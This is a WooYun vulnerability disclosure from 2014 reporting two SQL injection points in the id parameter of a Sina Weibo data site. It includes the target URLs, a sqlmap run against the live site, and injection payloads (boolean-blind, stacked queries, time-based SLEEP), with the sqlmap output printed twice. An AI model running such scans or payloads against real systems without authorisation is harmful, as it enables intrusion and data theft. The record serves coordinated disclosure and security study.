当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-084277

漏洞标题:新浪微博某站点SQL注入两处

相关厂商:新浪微博

漏洞作者: nextdoor

提交时间:2014-11-22 18:29

修复时间:2015-01-06 18:30

公开时间:2015-01-06 18:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-22: 细节已通知厂商并且等待厂商处理中
2014-11-22: 厂商已经确认,细节仅向厂商公开
2014-12-02: 细节向核心白帽子及相关领域专家公开
2014-12-12: 细节向普通白帽子公开
2014-12-22: 细节向实习白帽子公开
2015-01-06: 细节向公众公开

简要描述:

新浪微博某站点SQL注入两处

详细说明:

漏洞url

id参数存在注入
http://data.weibo.com/report/analystarticle?id=2205075871
http://data.weibo.com/report/reportDetail?id=193


D:\sqlmap>sqlmap -u "http://data.weibo.com/report/analystarticle?id=2131772313"
--current-db
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 17:03:15
[17:03:16] [INFO] using 'D:\sqlmap\output\data.weibo.com\session' as session fil
e
[17:03:16] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[17:03:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2131772313 AND 1282=1282
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: id=2131772313; SELECT SLEEP(5);#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=2131772313 AND SLEEP(5)
---
[17:03:17] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11
[17:03:17] [INFO] fetching current database
[17:03:17] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[17:03:17] [INFO] retrieved: distribute_multi_issue
current database: 'distribute_multi_issue'


sina22.PNG


sina23.PNG


一些表

sina21.PNG

漏洞证明:

漏洞url

id参数存在注入
http://data.weibo.com/report/analystarticle?id=2205075871
http://data.weibo.com/report/reportDetail?id=193


D:\sqlmap>sqlmap -u "http://data.weibo.com/report/analystarticle?id=2131772313"
--current-db
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 17:03:15
[17:03:16] [INFO] using 'D:\sqlmap\output\data.weibo.com\session' as session fil
e
[17:03:16] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[17:03:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2131772313 AND 1282=1282
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: id=2131772313; SELECT SLEEP(5);#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=2131772313 AND SLEEP(5)
---
[17:03:17] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11
[17:03:17] [INFO] fetching current database
[17:03:17] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[17:03:17] [INFO] retrieved: distribute_multi_issue
current database: 'distribute_multi_issue'


sina22.PNG


sina23.PNG


一些表

sina21.PNG

修复方案:

过滤

版权声明:转载请注明来源 nextdoor@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2014-11-22 22:28

厂商回复:

感谢关注新浪安全,漏洞修复中。

最新状态:

暂无